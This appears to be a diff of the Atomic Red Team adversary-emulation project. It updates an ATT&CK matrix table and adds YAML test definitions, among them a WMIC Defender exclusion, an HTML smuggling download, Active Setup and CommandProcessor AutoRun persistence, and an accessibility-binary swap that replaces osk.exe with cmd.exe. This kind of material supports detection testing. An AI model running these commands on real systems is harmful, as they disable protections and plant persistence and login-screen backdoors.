| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Active Setup](../../T1547.014/T1547.014.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
@@ -136,7 +136,7 @@
|
||||
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
|
||||
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
|
||||
|
||||
+660
-35
@@ -2171,7 +2171,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
@@ -10125,13 +10124,12 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Modify Registry of Local Machine - cmd
|
||||
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
|
||||
description: |
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -10701,7 +10699,6 @@ defense-evasion:
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Windows Powershell Logging Disabled
|
||||
auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
|
||||
description: |
|
||||
@@ -10851,7 +10848,6 @@ defense-evasion:
|
||||
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
|
||||
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Ursnif Malware Registry Key Creation
|
||||
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
|
||||
description: |
|
||||
@@ -10868,7 +10864,6 @@ defense-evasion:
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Terminal Server Client Connection History Cleared
|
||||
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
|
||||
description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
|
||||
@@ -18189,6 +18184,24 @@ defense-evasion:
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
description: |
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference
|
||||
call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
|
||||
'
|
||||
cleanup_command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class
|
||||
MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -22999,7 +23012,34 @@ defense-evasion:
|
||||
- Static File Analysis
|
||||
x_mitre_attack_spec_version: 2.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
atomic_tests: []
|
||||
identifier: T1027.006
|
||||
atomic_tests:
|
||||
- name: HTML Smuggling Remote Payload
|
||||
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
|
||||
without userinteraction. \nThe HTML file is based off of the work from [Stan
|
||||
Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependencies:
|
||||
- description: 'T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
executor:
|
||||
command: 'PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
|
||||
'
|
||||
cleanup_command: "$user = [System.Environment]::UserName; Remove-Item -Path
|
||||
C:\\Users\\$user\\Downloads\\FeelTheBurn.iso"
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
T1556.005:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -28594,7 +28634,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
@@ -29676,7 +29715,76 @@ privilege-escalation:
|
||||
- 'Command: Command Execution'
|
||||
x_mitre_permissions_required:
|
||||
- Administrator
|
||||
atomic_tests: []
|
||||
identifier: T1547.014
|
||||
atomic_tests:
|
||||
- name: HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components' to launch calc by configuring an active setup
|
||||
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
|
||||
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
|
||||
run during the next logon for each user.\n\nNote: If you logout before running
|
||||
the cleanup command, you will be required to go through the OOBE (out-of-box
|
||||
experience) setup sequence to log back in. \nThe payload will only run once
|
||||
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
|
||||
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
|
||||
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
|
||||
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
|
||||
/AlternateShellStartup"
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: "This test will add a StubPath entry to the Active Setup native
|
||||
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
\nSaid key doesn't have a StubPath value by default, by adding one it will
|
||||
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
\nWithout the last command it will normally run on next user logon. Note:
|
||||
this test will only run once successfully if no cleanup command is run in
|
||||
between test.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
|
||||
version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: "This test will decrease the version number of the 'Internet Explorer
|
||||
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
|
||||
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1484.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -34345,7 +34453,7 @@ privilege-escalation:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -34354,6 +34462,33 @@ privilege-escalation:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: 'Replace accessiblity executable with cmd.exe to provide elevated
|
||||
command prompt from login screen without logging in.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1504:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -34952,6 +35087,34 @@ privilege-escalation:
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: 'osascript #{scriptfile}
|
||||
|
||||
'
|
||||
cleanup_command: 'osascript #{cleanup_script}
|
||||
|
||||
'
|
||||
name: bash
|
||||
T1134.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -36591,7 +36754,6 @@ privilege-escalation:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
|
||||
@@ -37663,7 +37825,8 @@ privilege-escalation:
|
||||
- description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
@@ -37678,6 +37841,47 @@ privilege-escalation:
|
||||
-Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
default: notepad.exe
|
||||
executor:
|
||||
command: New-ItemProperty -Path "HKLM:\Software\Microsoft\Command Processor"
|
||||
-Name "AutoRun" -Value "#{command}" -PropertyType "String"
|
||||
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Command
|
||||
Processor" -Name "AutoRun" -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01
|
||||
description: |-
|
||||
An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
|
||||
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to Execute
|
||||
type: string
|
||||
